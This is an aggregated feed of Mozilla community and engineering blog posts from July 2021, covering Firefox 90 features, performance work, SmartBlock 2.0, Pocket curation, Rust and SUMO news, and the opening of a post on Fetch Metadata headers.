Each week in Top Shelf, we will be sharing the tweets that made us laugh, think, Pocket them for later, text our friends, and want to continue the internet revolution each week.

Here’s what made it to the Top Shelf for the week of July 12, 2021, in no particular order.

The post Olivia Rodrigo, the cast of “The French Dispatch,” “Loki” and more are on this week’s Top Shelf appeared first on The Mozilla Blog.

Mozilla Reps CommunityNew Council Members – 2021 H1 Election

We are happy to welcome two new fully onboarded members to the Reps Council!

 

Hossain Al Ikram and Luis Sanchez join the other continuing members in leading the Reps Program. Tim Maks van den Broek was also re-elected and continues to contribute to the council.

 

Both Ikram and Luis are starting their activity as council members by contributing to the Mentorship project. They are focusing on supporting communication within the Mentors and the Council (such as preparing Mentors Calla) and on renewing and carrying out the onboarding for new Mentors.

 

As the new members become active in the Council, we want to thank outgoing members for their contributions. Thank you very much Shina and Faisal!

 

The Mozilla Reps Council is the governing body of the Mozilla Reps Program. It provides the general vision of the program and oversees day-to-day operations globally. Currently, 7 volunteers and 2 paid staff sit on the council. Find out more in the Reps wiki, and look up current members in the Community Portal.

Mozilla Performance BlogWhat’s new in Perfherder?

Since last “What’s new in Perfherder” article a lot has changed. Our development team is making progresses towards automating the regression detection process. This post will cover the various improvements that have been made to Perfherder since July 2020.

Alerts view

We added tags for tests. They are meant to describe what type of test it is. For example, the alert below is the PerceptualSpeedIndex visual metric for the cold variant of reddit.

Alert

The “Tags” column is next to “Test and platform”

We improved the checkbox of the alert summaries so can all alert items be selected by a specific status.

Check alerts menu

Check alerts menu

Talos tests now have links to documentation for every alert item, so if one isn’t very familiar to the regressed/improved test, this documentation can help for a better understanding of it. The alert items can be sorted by the various columns present in the alerts view. We split the Test and platform column into Test and Platform and we are now able to sort by platform also.

The Previous Value, New Value, Absolute Difference, and Magnitude of Change were joined together into a single Magnitude of Change column as they were showing basically the same information. Last but not least, the graph link at the end of each test name was moved under the star as a graph icon.

Alerts view

The documentation link is present at the end of every test name and platform The sorting buttons are available next to each column

Regression template

We’ve almost automated the filing of the regression bugs. We don’t have to copy-paste anymore the details from the regressor bug but just to input its number in the dialog below and the new bug screen the fields will auto-populate. The only thing that’s left to be automated is setting the Version of the bug, which should be the latest release of Firefox. It is currently set to unspecified.

File regression bug modal

File Regression Bug Modal

 

The autofilled fields, screen 1

The autofilled fields, Screen 1

The autofilled fields, Screen 2

The autofilled fields, Screen 2

The autofilled fields, Screen 3

The autofilled fields, Screen 3

Another cool thing that we improved is a link to the visual recordings of a browsertime pageload test. In the comment 0/description of the bug, the old and new (regressed) values are linked to a tgz archive that contains the video recording of the pageload test for each page cycle.

Before and after links

The before and after links are under “Absolute values” column

Compare view

We added pagination for compare view when the number of results is higher than 10 and now we don’t have the problem of loading too much results in one page anymore.

Compare view

Compare view with pagination

Backfill tool

The backfill tool is probably the biggest surprise. We call it Sherlock. It runs every hour and checks that there are data points for the revision the alert is created on and the previous one. It basically makes sure that there’s no data points gap so the culprit is identified precisely.

Backfill report email

Backfill report email

UI/UX improvements

Of course the improvements are not limited to those, we’ve made various backend and front-end cleanups and optimizations not really visible to the UI:

  • The graph view tooltip was adjusted to avoid it obscuring the target text
  • The empty alert summaries were removed from the database
  • The Perfherder UI was improved to better indicate mouse-overs and actionable elements

Firefox Add-on ReviewsFind an interesting image? Use an image search extension like Tineye to discover hidden details

Reverse image search is the process of using an image as the starting point of your search to learn more about the picture, where it came from, or its subjects. 

Why do people perform reverse image searches? Reasons vary, but there are typically two types of objectives:

Track images across the web

Use an image search extension to find all the places where an image is presented. This is useful for people like…

  • Photographers, digital artists and designers who want to know if their proprietary work is being used without credit, consent, or in inappropriate ways. 
  • Content marketers who want to measure the impact of images used in their campaigns. For instance, let’s say you included a picture of a new product in a press release. Image search can help you track how far and wide that promotional image has spread. 
  • Anyone who’s posted personal pics. With so many people posting images of themselves on social media and elsewhere, sometimes a person’s face can unwittingly wind up on a McDonald’s ad in China

Authenticate imagery

There are many reasons you might want to investigate the veracity of an image you find on the web…

  • Fake news! Unscrupulous “news” sources have been known to use false images in stories to distort narratives. If you question images seen in a news article, research it yourself with an image search extension. 
  • Verify business and personal contacts. Sometimes people are not who they appear to be—literally. If you’ve been contacted by a questionable marketer on LinkedIn or you’re wondering if the person you met on a dating app is legit, investigate the image. 
  • Give image credit. If you find an image to use in your own published work—for example, a blog post—and you want to credit the source, use a reverse image search extension to track down the owner.
<figcaption>Find a delicious looking dish and want to know how to prepare it? Sometimes a reverse image search can track it back to an online recipe or cookbook.</figcaption>

With these cases in mind, here are a few of the best reverse image search extensions out there…

Tineye Reverse Image Search

A pioneer in the image search field, Tineye uses complex visual identification features—like finding patterns in lines, textures, colors, and contours of an image—to look for precise copies of the image elsewhere on the web. 

Tineye can also help you locate higher resolution versions of an image, should one exist; and it lets you know if the image in question is available for licensing. 

Tineye image searches are private. Your searches are not tracked, nor are the images you search saved to the Tineye index.

Search by Image

Combine the power of a bunch of image search engines with the Search by Image browser extension. More than 30 image search indexes offered in all, including the big names like Tineye, Google, Bing, and Yandex, but also some interesting niche indexes like Pinterest and Getty Images. 

You’re free to set your favorite image search engine as the default, or get results from as many of the 30+ engines as you like. Search by Image settings are simple and straightforward. 

Image Search Options

So easy to use. Simply right-click any image you find to pull up a context menu and select one of the available search engines, like Tineye, Google, Baidu, or Image Search Options’ very own image index called SauceNAO. 

If the extension doesn’t already offer your favorite image search engine, it’s easy to manually add it to Image Search Options. 

Happy image hunting with a browser extension! Find more image and other search tools on addons.mozilla.org.

This Week In RustThis Week in Rust 399

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

Official
Newsletters
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
Papers
Miscellaneous

Crate of the Week

This week's crate is endbasic, an emulator friendly DOS / BASIC environment running on small hardware and the web.

Thanks to Julio Merino for the suggestion.

Submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

Synth

Forest

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

254 pull requests were merged in the last week

Rust Compiler Performance Triage

Mostly quiet week; improvements outweighed regressions.

Triage done by @simulacrum. Revision range: 9a27044f4..5aff6dd

1 Regressions, 4 Improvements, 0 Mixed; 0 of them in rollups

Full report here.

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs

No RFCs are currently in the final comment period.

Tracking Issues & PRs
New RFCs

Upcoming Events

Online
North America

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

GraphCDN

Netlify

ChainSafe Systems

NZXT

Kollider

Tempus Ex

Estuary

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

Beginning Rust: Uh why does the compiler stop me from doing things this is horrible

Advanced Rust: Ugh why doesn't the compiler stop me from doing things this is horrible

qDot on twitter

Thanks to Nixon Enraght-Moony for the self-suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, and cdmistman.

Discuss on r/rust

Hacks.Mozilla.OrgGetting lively with Firefox 90

Getting lively with Firefox 90

As the summer rolls around for those of us in the northern hemisphere, temperatures are high and unwinding with a cool ice tea is high on the agenda. Isn’t it lucky then that Background Update is here for Windows, which means Firefox can update even if it’s not running. We can just sit back and relax!

Also this release we see a few nice JavaScript additions, including private fields and methods for classes, and the at() method for Array, String and TypedArray global objects.

This blog post just provides a set of highlights; for all the details, check out the following:

Classes go private

A feature JavaScript has lacked since its inception, private fields and methods are now enabled by default In Firefox 90. This allows you to declare private properties within a class. You can not reference these private properties from outside of the class; they can only be read or written within the class body.

Private names must be prefixed with a ‘hash mark’ (#) to distinguish them from any public properties a class might hold.

This shows how to declare private fields as opposed to public ones within a class:

class ClassWithPrivateProperties {

  #privateField;
  publicField;

  constructor() {

    // can be referenced within the class, but not accessed outside
    this.#privateField = 42;

    // can be referenced within the class aswell as outside
    this.publicField = 52;
}

  // again, can only be used within the class
  #privateMethod() {
    return 'hello world';
  }

  // can be called when using the class
  getPrivateMessage() {
    return this.#privateMethod();
  }
}

Static fields and methods can also be private. For a more detailed overview and explanation, check out the great guide: Working with private class features. You can also read what it takes to implement such a feature in our previous blog post Implementing Private Fields for JavaScript.

JavaScript at() method

The relative indexing method at() has been added to the Array, String and TypedArray global objects.

Passing a positive integer to the method returns the item or character at that position. However the highlight with this method, is that it also accepts negative integers. These count back from the end of the array or string. For example, 1 would return the second item or character and -1 would return the last item or character.

This example declares an array of values and uses the at() method to select an item in that array from the end.

const myArray = [5, 12, 8, 130, 44];

let arrItem = myArray.at(-2);

// arrItem = 130

It’s worth mentioning there are other common ways of doing this, however this one looks quite neat.

Conic gradients for Canvas

The 2D Canvas API has a new createConicGradient() method, which creates a gradient around a point (rather than from it, like createRadialGradient() ). This feature allows you to specify where you want the center to be and in which direction the gradient should start. You then add the colours you want and where they should begin (and end).

This example creates a conic gradient with 5 colour stops, which we use to fill a rectangle.

var canvas = document.getElementById('canvas');

var ctx = canvas.getContext('2d');

// Create a conic gradient
// The start angle is 0
// The centre position is 100, 100
var gradient = ctx.createConicGradient(0, 100, 100);

// Add five color stops
gradient.addColorStop(0, "red");
gradient.addColorStop(0.25, "orange");
gradient.addColorStop(0.5, "yellow");
gradient.addColorStop(0.75, "green");
gradient.addColorStop(1, "blue");

// Set the fill style and draw a rectangle
ctx.fillStyle = gradient;
ctx.fillRect(20, 20, 200, 200);

The result looks like this:

Rainbow radial gradient

New Request Headers

Fetch metadata request headers provide information about the context from which a request originated. This allows the server to make decisions about whether a request should be allowed based on where the request came from and how the resource will be used. Firefox 90 enables the following by default:

The post Getting lively with Firefox 90 appeared first on Mozilla Hacks - the Web developer blog.

Mozilla Performance BlogBringing you a snappier Firefox

In this blog post we’ll talk about what the Firefox Performance team set out to achieve for 2021 and the Firefox 89 release last month. With the help of many people from across the Firefox organization, we delivered a 10-30% snappier, more instantaneous Firefox experience. That’s right, it isn’t just you! Firefox is faster, and we have the numbers to prove it.

Some of the things you might find giving you a snappier response are:

  • Typing in the URL bar or a document editor (like Google Docs or Office 365)
  • Opening a site menu like the file menu on Google Docs
  • Playing a browser based video game and using your keyboard to control your movements within the video

Our Goals

We have made many page-load and startup performance improvements over the last couple of years which have made Firefox measurably faster. But we hadn’t spent much time looking at how quickly the browser responds to little user interactions like typing in a search bar or changing tabs. Little things can add up, and we want to deliver the best performance for every user experience. So, we decided it was time to focus our efforts on responsiveness performance starting with the Firefox June release.

Responsiveness

The meaning of the word responsiveness as used within computer applications can be rather broad, so for the purpose of this blogpost, we will define three types of experiences that can impact the responsive feel of a browser.

  1. Instantaneous responsiveness: These are simple actions taken by a user where the browser ought to respond instantly. An example is pressing a key on your keyboard in a document or an input field. You want these to be displayed as swiftly as possible, giving the user a sense of instantaneous feedback. In general this means we want the results for these interactions to be displayed within 50ms[1] of the user taking an action.
  2. Small but perceptible lag: This is an interaction where the response is not instantaneous and there is enough work involved that it is not expected to be. The lag is sufficient for the user to perceive it, even if they are not distracted from the task at hand. This is something like switching between channels on Slack or selecting an email in Gmail. A typical threshold for this would be that these interactions occur in under a second.
  3. Jank: This is when a site, or in the worst case the browser UI itself, actually becomes unresponsive to user input for a non-insignificant amount of time. These are disruptive and perceptible pauses in interaction with the browser.

Instantaneous Responsiveness

We’ve had some pretty solid indications (from tests and proofs of concepts) that we could make our already fast interactions feel even more instantaneous. One area in particular that stood out to us was the ‘depth’ of our painting pipeline.

About our painting pipeline

Let’s talk about that a little more. Here you can see a graphical representation of our old painting pipeline:

Most users currently use 60Hz monitors, which means their monitor displays 60 frames per second. Each segment of the timeline above represents a single frame on the screen and is approximately 16.67ms.

In most cases, when input is received from the operating system, it would take anywhere from 0 to 16.67ms for the next frame to occur (1), and at the start of that new frame, we would paint the resulting changes to the UI (the green rectangle).

Then another 16.67ms later (2), we would composite the results of that drawing onto the browser window, which would then be handed off to the OS (the blue rectangle).

At the earliest, it would be another 16.67ms later (3) when the operating system would actually present the result of the user interaction (input) to the user. This means even in the ideal case it would take at least 34-50ms for the result of an interaction to show up on the screen. But often there is other work the browser might be doing, or additional latency introduced by the input devices, the operating system, or the display hardware that would make this response even slower.

Shortening the Painting Pipeline

We set out to improve that situation by shortening the painting pipeline and by better scheduling when we handle input events. Some of the first results of this work were landed by Matt Woodrow, where he implemented a suggestion by Markus Stange in bug 1675614. This essentially changed the painting pipeline like this:

We now paint as soon as we finish processing user input if we believe we have enough time to finish before the next frame comes in. This means we can then composite the results one frame earlier. So in most cases, this will result in the frame being seen a whole 16.67ms earlier by the users. We’ll talk some more about the results of this work later.

Currently this solution doesn’t always work, for example if there are other animations happening. In Firefox 91, we’re bringing this to more situations as well as improvements to the scheduling of our input event handling. We’ll be sure to talk more about those in future blog posts!

Small but perceptible lag

When it comes to small but perceptible lags in interaction, we found that the majority of lags are caused by time spent in JavaScript code. Much has been written about why JavaScript engines in their current form are often optimized for the wrong thing. TL;DR – Years of optimizing for benchmarks have driven a lot of decisions inside the engine that do not match well with real world web applications and frameworks like React.

Real World JavaScript Performance

In order to address this, we’ve begun to closely investigate commonly used websites in an attempt to understand where our browser may be under-performing on these workloads. Many different experiments fell out of this, and several of these have turned into promising improvements to SpiderMonkey, Firefox’s JavaScript engine. (The SpiderMonkey team has their own blog, where you can follow along with some of the work they’re doing.) One result of these experiments was an improvement to array iterators (bug 1699851), which gave us a surprise improvement in the Firefox June Release.

Along with this, many other ideas were prototyped and implemented for future versions. From improvements to the architecture of object structures to faster for-of loops, the JavaScript team has contributed much of their time to offering significant improvements to real world JS performance that are setting us up for plenty of further improvements to come throughout the rest of 2021. We’d especially like to thank Ted Campbell, Iain Ireland, Steve Fink, Jan de Mooij and Denis Palmeiro for their many contributions!

Jank

Through hard work from Florian Quèze and Doug Thayer, we now have a Background Hang Reporter tool that helps us detect (and ultimately fix) browser jank.

Background Hang Reporter

While still in the early stages of development, this tool has already proven extremely useful. The resulting data can be found here. This essentially makes it possible for us to see the stacktraces of frequently seen main thread hangs inside the Firefox parent process. We can also attach bugs to these hangs in the tool, and this has already helped us address some important issues.

For example, we discovered that accessibility was being enabled unnecessarily for most Windows users with a touchscreen. In order to facilitate accessibility features, the browser does considerable extra work. While this extra work is critical to our many users that require these accessibility features, it caused considerable jank for many users that did not need them. James Teh’s assistance was invaluable in resolving this, and with the landing of bug 1687535, the number of users with accessibility code unnecessarily enabled, as well as the number of associated hang reports, has gone down considerably.

Measuring performance

Along with all this work, we’ve also been in the process of attempting to do better at measuring the performance for our users ‘in the wild’, as we like to say. This means adding more telemetry probes that collect data about how your browser is performing in an anonymous way, without compromising your privacy. This allows us to detect improvements with an accuracy that no form of internal testing can really provide.

Improved “instantaneous responsiveness”

As an example we can look at the latency for our keyboard interactions. This describes the time taken between the operating system delivering us a keyboard event, to us handing the frame off to the window manager:

If we take into account an additional frame the OS requires to display our change, 34ms is approximately the time required to hit the 50ms “instantaneous” threshold,). Looking at the 28-35ms bucket, we see that we now hit that target more than 40% of the time, vs less than 30% in Firefox 86.

Improved “Small but perceptible lag”

Another datapoint we can look at actually tells us more about the speed of our JS processing, this describes the time from when we receive an input event from the operating system, to when we’ve processed the JavaScript handler associated with that input event.

If we look carefully here we can see a small, but consistent shift here from the higher buckets to the lower buckets. We’ve actually been able to track this improvement down and it appears to have occurred right around the landing of bug 1699851. Since we had not been able to detect this improvement internally outside of microbenchmarks, it reaffirms the value of improving our telemetry further to better determine how our work is impacting real users.

What’s Next?

We’d like to again thank all the people (including those we might have forgotten!) that contributed to these efforts. All the work described above is still in its early days, and all the improvements we’ve shown here are the result of first steps taken as a part of more extensive plans to improve Firefox responsiveness.

So if you feel Firefox is more responsive, it isn’t just your imagination, and more importantly, we’ve got more speedups coming!


[1] Research varies widely on this so we choose 50ms as a latency threshold which is imperceptible to most users.

Mozilla Security BlogFirefox 90 introduces SmartBlock 2.0 for Private Browsing

Today, with the launch of Firefox 90, we are excited to announce a new version of SmartBlock, our advanced tracker blocking mechanism built into Firefox Private Browsing and Strict Mode. SmartBlock 2.0 combines a great web browsing experience with robust privacy protection, by ensuring that you can still use third-party Facebook login buttons to sign in to websites, while providing strong defenses against cross-site tracking.

At Mozilla, we believe that privacy is a fundamental right. As part of the effort to provide a strong privacy option, Firefox includes the built-in Tracking Protection feature that operates in Private Browsing windows and Strict Mode to automatically block scripts, images, and other content from being loaded from known cross-site trackers. Unfortunately, blocking such cross-site tracking content can break website functionality.

Ensuring smooth logins with Facebook

Logging into websites is, of course, a critical piece of functionality. For example: many people value the convenience of being able to use Facebook to sign up for, and log into, a website. However, Firefox Private Browsing blocks Facebook scripts by default: that’s because our partner Disconnect includes Facebook domains on their list of known trackers. Historically, when Facebook scripts were blocked, those logins would no longer work.

For instance, if you visit etsy.com in a Private Browsing window, the front page gives the following options to sign in, including a button to sign in using Facebook’s login service. If you click on the Enhanced Tracking Protection shield in the address bar, ()and click on Tracking Content, however, you will see that Firefox has automatically blocked third-party tracking content from Facebook to prevent any possible tracking of you by Facebook on that page:

Etsy Sign In forrm using "Continue with Facebook"Prior to Firefox 90, if you were using a Private Browsing window, when you clicked on the “Continue with Facebook” button to sign in, the “sign in” would fail to proceed because the third-party Facebook script required had been blocked by Firefox.

Now, SmartBlock 2.0 in Firefox 90 eliminates this login problem. Initially, Facebook scripts are all blocked, just as before, ensuring your privacy is preserved. But when you click on the “Continue with Facebook” button to sign in, SmartBlock reacts by quickly unblocking the Facebook login script just in time for the sign-in to proceed smoothly. When this script gets loaded, you can see that unblocking indicated in the list of blocked tracking content:

SmartBlock 2.0 provides this new capability on numerous websites. On all websites where you haven’t signed in, Firefox continues to block scripts from Facebook that would be able to track you. That’s right — you don’t have to choose between being protected from tracking or using Facebook to sign in. Thanks to Firefox SmartBlock, you can have your cake and eat it too!

And we’re baking more cakes! We are continuously working to expand SmartBlock’s capabilities in Firefox Private Browsing and Strict Mode to give you an even better experience on the web while continuing to provide strong protection against trackers.

Thank you

Our privacy protections are a labor of love. We want to acknowledge the work and support of many people at Mozilla that helped to make SmartBlock possible, including Paul Zühlcke, Johann Hofmann, Steven Englehardt, Tanvi Vyas, Wennie Leung, Mikal Lewis, Tim Huang, Dimi Lee, Ethan Tseng, Prangya Basu, and Selena Deckelmann.

The post Firefox 90 introduces SmartBlock 2.0 for Private Browsing appeared first on Mozilla Security Blog.

Support.Mozilla.OrgWhat’s up with SUMO – July 2021

Hey SUMO folks,

Welcome to a new quarter. Lots of projects and planning are underway. But first, let’s take a step back and see what we’ve been doing for the past month.

Welcome on board!

  1. Hello to strafy, Naheed, Taimur Ahmad, and Felipe. Thanks for contributing to the forum and welcome to SUMO!

Community news

  • The advance search syntax is available on our platform now (read more about it here).
  • Our wiki has a new face now. Please take a look and let us know if you have any feedback.
  • Another reminder to check out Firefox Daily Digest to get daily updates about Firefox. Go check it out and subscribe if you haven’t already.
  • Check out the following release notes from Kitsune in the month:

Community call

  • Watch the monthly community call if you haven’t. Learn more about what’s new in June!
  • Reminder: Don’t hesitate to join the call in person if you can. We try our best to provide a safe space for everyone to contribute. You’re more than welcome to lurk in the call if you don’t feel comfortable turning on your video or speaking up. If you feel shy to ask questions during the meeting, feel free to add your questions on the contributor forum in advance, or put them in our Matrix channel, so we can address them during the meeting.

Community stats

KB

KB Page views

Month Page views Vs previous month
June 2021 9,125,327 +20.04%

Top 5 KB contributors in the last 90 days: 

  1. AliceWyman
  2. Michele Rodaro
  3. Pierre
  4. Romado33
  5. wsmwk

KB Localization

Top 10 locale (besides en) based on total page views

Locale Apr 2021 page views Localization progress (per Jul, 8)
de 10.21% 100%
fr 7.51% 89%
es 6.58% 46%
pt-BR 5.43% 65%
ru 4.62% 99%
zh-CN 4.23% 99%
ja 3.98% 54%
pl 2.49% 84%
it 2.42% 100%
id 1.61% 2%

Top 5 localization contributors in the last 90 days: 

  1. Milupo
  2. JimSp472
  3. Soucet
  4. Michele Rodaro
  5. Artist

Forum Support

Forum stats

Month Total questions Answer rate within 72 hrs Solved rate within 72 hrs Forum helpfulness
Jun 2021 4676 63.58% 15.93% 78.33%

Top 5 forum contributors in the last 90 days: 

  1. Cor-el
  2. Jscher2000
  3. FredMcD
  4. Seburo
  5. Sfhowes

Social Support

Channel Jun 2021
Total conv Conv handled
@firefox 7082 160
@FirefoxSupport 1274 448

Top 5 contributors in Q1 2021

  1. Christophe Villeneuve
  2. Pravin
  3. Emin Mastizada
  4. Md Monirul Alom
  5. Andrew Truong

Play Store Support

We don’t have enough data for the Play Store Support yet. However, you can check out the overall Respond Tool metrics here.

Product updates

Firefox desktop

  • FX Desktop V90 (07/13)
    • Shimming Exceptions UI (Smarkblock)
    • DNS over HTTPS – remote settings config
    • Background Update Agent (BAU)
    • About:third-party

Firefox mobile

  • FX Android V90 (07/13)
    • Credit Card Auto-Complete
  • FX IOS V35 (07/13)
    • Folders for your Bookmarks
    • Opt-in or out of Experiments

Other products / Experiments

  • Mozilla VPN V2.4 (07/13)
    • Split Tunneling (Windows and Linux)
    • Support for Local DNS
    • Addition of In app Feedback submission
    • Variable Pricing addition (EU and US)
    • Expansion Phase 2 to EU (Spain, Italy, Belgium, Austria, Switzerland)

Shout-outs!

  • Kudos for everyone who’s been helping with the Firefox 89 release.
  • Franz for helping with the forum and for the search handover insight.

If you know anyone that we should feature here, please contact Kiki and we’ll make sure to add them in our next edition.

Useful links:

The Mozilla BlogBreak free from the doomscroll with Pocket

Last year a new phrase crept into the zeitgeist: doomscrolling, the tendency to get stuck in a bad news content cycle even when consuming it makes us feel worse. That’s no surprise given that 2020 was one for the books with an unrelenting flow of calamitous topics, from the pandemic to murder hornets to wild fires. Even before we had a name for it and real life became a Nostradamus prediction, it was all too easy to fall into the doomscroll trap. Many content recommendation algorithms are designed to keep our eyeballs glued to a screen, potentially leading us into more questionable, extreme or ominous territory.

Pocket, the content recommendation and saving service from Mozilla, offers a brighter view, inviting readers to take a different direction with high-quality content and an interface that isn’t designed to trap you or bring you down. You can get great recommendations and also save content to your Pocket, both in the app and through Firefox, every time you open a new tab in the browser. Pocket doesn’t send you down questionable rabbit holes or bombard you with a deluge of depressing or anxiety-producing content. Its recommendations are vetted by thoughtful, dedicated human editors who do a lot of reading and watching so you don’t have to dig through the muck.

“I’ve always loved reading, and it is definitely a thrill to read all day at my desk and not feel like I’m procrastinating. I’m actually doing my job,” said Amy Maoz, Pocket recommendations editor.

Amy and colleague Alex Dalenberg are two members of Pocket’s human curator team, and they are some of the people who look after the stories that appear on the Firefox new tab page.

Every day, Pocket users save millions of articles, videos, links and more from across the web, forming the foundation of Pocket’s recommendations. From this activity, Pocket’s algorithms surface the most-saved and most-read content from the Pocket community. Pocket’s human curators then sift through this material and elevate great reads for the recommendation mix: in-depth features, clever explainers, curiosity chasers, timely reads and evergreen pieces. The curator team makes sure that a wide assortment of publishers are represented, as well as a large variety of topics, including what’s happening in the world right now. And it’s done in a way that respects and preserves the privacy of Pocket readers.

“I’m consistently impressed and delighted by what great content Pocket users find all across the web,” said Maoz. “Our users do an incredible job pointing us to fascinating, entertaining and informative articles and videos and more.”

“Saving something in your Pocket is different from, say, pressing the ‘like’ button on it,” Alex Dalenberg, Pocket recommendations editor, added. “It’s more personal. You are saving it for later, so it’s less performative. And that often points us to real gems.”

It makes sense that a lot of big, juicy stories end up in Pocket; articles from The New York Times, The Guardian, Wired and The Ringer are regularly among the top-saved by readers. Pocket’s algorithms also flag stories from smaller publications that receive a notable number of saves and highlight them to the curators for consideration. That allows smaller publications and diverse voices to get wider exposure for content that might have otherwise flown under the radar.

“The power of the web is that everybody owns a printing press now, but I feel like we’ve lost a bit of that web 1.0 or 1.5 feeling,” Dalenberg said. “It’s always really exciting when we can surface exceptional content from smaller players and indie web publications, not just the usual suspects. It’s also great to hear people say how much they like discovering new publications because they saw them in Pocket’s recommendations.”

The power of a Pocket recommendation

Scalawag magazine is a small nonprofit publication dedicated to U.S. Southern culture and issues, with a belief that great storytelling and reporting can lead to policy changes. Last June, Scalawag published a round-up piece entitled Reckoning with white supremacy: Five fundamentals for white folks to share how they had been covering issues of systemic racism in the South and police systems since it launched in 2015.

“I wrote it mostly for other folks on the team to use as a guide to send to well-meaning friends who found themselves suddenly interested in these issues in the summer of protests, almost as a reference guide for people unfamiliar with our work but who wanted to learn more,” said Lovey Cooper, Scalawag’s Managing Editor and author of the piece.

Cooper published it on a Wednesday evening and sent it to a few friends on Thursday. By Friday morning, traffic was suddenly overwhelming their site, and Pocket was the driver. The Pocket team had recommended  Cooper’s story on the Firefox new tab, and people were reading it. Lots of them.

“I watched the metrics as I sat on the phone with various tech gurus to get the site back up and running, and within two hours — even with the site not working anywhere except in-app viewers like Pocket — the piece became our most viewed story of the year,” she said.

By Sunday, Scalawag saw more than five times its usual average monthly visitors to the site since Friday alone. They gained hundreds of new email subscribers, and thousands in expected lifetime membership and one-time donation revenue from readers who had not previously registered on the site. It became the most viewed story Scalawag had ever published, beating out by a huge margin the couple of times The New York Times featured them.

“The rest of June was a whirlwind too,” Cooper said. “We were being asked to speak on radio programs and at events like never before, due to our unique positioning as lifelong champions of racial and social justice. Just as those topics came into the mainstream zeitgeist, we were perfectly poised to showcase to the world that, yes, Scalawag has indeed always been fighting this fight with our stories — and here are the articles to prove it.”

Cooper’s piece was also included in a Pocket collection, What We’re Reading: The Fight for Racial Equity, Justice and Black Lives. Pocket has continued to publish Racial Justice collections, a set of in-depth collections curated by Black scholars, journalists and writers.

“We saw this as an opportunity to use our platform to amplify and champion Black voices and diverse perspectives,” said Carolyn O’Hara, Director of Editorial at Pocket. “We have always felt that it’s our responsibility at Pocket to highlight pieces that can inform and inspire from all across the web, and we’re more committed to that than ever.”

Scalawag’s story shows how Pocket’s curated recommendations can provide hungry readers with context and information while elevating smaller publishers whose thoughtful content deserves more attention and readership.

Quality content over dubious information

The idea that everyone has a printing press thanks to the internet is a double-edged sword. Anyone can publish anything, which has also opened the door to misinformation as a cottage industry. Then it shows up on social media. And with more people turning to social media as their news and information sources, even when it isn’t vetted, misinformation quickly takes off and does damage. But you won’t find it in Pocket.

The Pocket editorial team works hard to maintain one bias: quality content. Along with misinformation, you won’t find clickbait on Pocket, nor are you likely to find breaking news. Those are more in the moment reads, rather than save it for later reads. Maoz asserts that no one really saves articles like Here’s what 10 celebs look like in bikinis to read it tomorrow. They might click it, but they don’t hold onto it with Pocket.


Essential Reading: What is ransomware?

Here’s what you need to know about the growing cybersecurity threat.


And when it comes to current events and breaking news, you’ll find that Pocket recommendations often have a wider or higher altitude view. “We’re not necessarily recommending the first or second day story but the Sunday magazine story,” Dalenberg adds, since it’s often the longer, more in-depth reads that users are saving. That would be the history of the bathing suit, for example, rather than a clickbait celeb paparazzi story, whose goal might solely be to deploy online tracking and serve ads more so than to provide quality content.

“People are opening a new tab in Firefox to do something, and we aren’t trying to shock or surprise them into clicking on our recommendations, to bait them into engaging, in other words,” said Maoz. “We’re offering up content we believe is worthy of their time and attention. ”

Curators won’t recommend content to Pocket that they believe is misleading or sensational, or from a source without a strong history of integrity. They also avoid articles based on studies with just a single source, choosing instead to wait until there is more information to confirm or debunk the story. They also review the meta-image – the preview image that appears when an article is shared. Since they don’t have control over what image a publisher selects, they take care to avoid surprising people with inappropriate visuals on the Firefox new tab.

As part of the Mozilla family, Pocket, like Firefox, looks out for your privacy.

“Pocket doesn’t mine everyone’s data to show them creepily targeted stories and things they don’t actually want to read,” Maoz said. “When I tell people about what I do at Pocket, I always tie it back to privacy, which I think is really cool. That’s basically why we have jobs — because Mozilla cares about privacy.”

The post Break free from the doomscroll with Pocket appeared first on The Mozilla Blog.

William Lachance10 years at Mozilla

Yesterday (July 11, 2021) was the 10 year anniversary of starting at the Mozilla Corporation. My life has changed a ton in those years: in that time I ended a marriage, changed the city in which I live two times, and took up religion1. Mozilla has also changed pretty drastically in my time here, especially in the last year.

Yet somehow I’m still at it, for more or less for the same reasons that led me to accept my initial offer to join the A-team.2 The Internet has the immense potential to be a force for individual empowerment and yet more than ever, we see this technology used to consolidate unchecked power, spread misinformation, and generally exploit people. Mozilla is not perfect (no organization is: 10 years anywhere will teach you that), but it’s one of the few remaining counter-forces to these accelerating trends. While I’m currently taking a bit of a break to explore some stuff on my own, I am looking forward to getting back to work on the mission when I return in mid-August.

  1. To the extent that Zen Buddhism is a religion. 

  2. I’ve since moved to Data @ Mozilla 

Mozilla Security BlogFirefox 90 supports Fetch Metadata Request Headers

 

We are pleased to announce that Firefox 90 will support Fetch Metadata Request Headers which allows web applications to protect themselves and their users against various cross-origin threats like (a) cross-site request forgery (CSRF), (b) cross-site leaks (XS-Leaks), and (c) speculative cross-site execution side channel (Spectre) attacks.

 

Cross-site attacks on Web Applications

The fundamental security problem underlying cross-site attacks is that the web in its open nature does not allow web application servers to easily distinguish between requests originating from its own application or originating from a malicious (cross-site) application, potentially opened in a different browser tab.

 

Firefox 90 sending Fetch Metadata (Sec-Fetch-*) Request Headers which allows web application servers to protect themselves against all sorts of cross site attacks.

 

For example, as illustrated in the Figure above, let’s assume you log into your banking site hosted at https://banking.com and you conduct some online banking activities. Simultaneously, an attacker controlled website opened in a different browser tab and illustread as https://attacker.com performs some malicious actions.

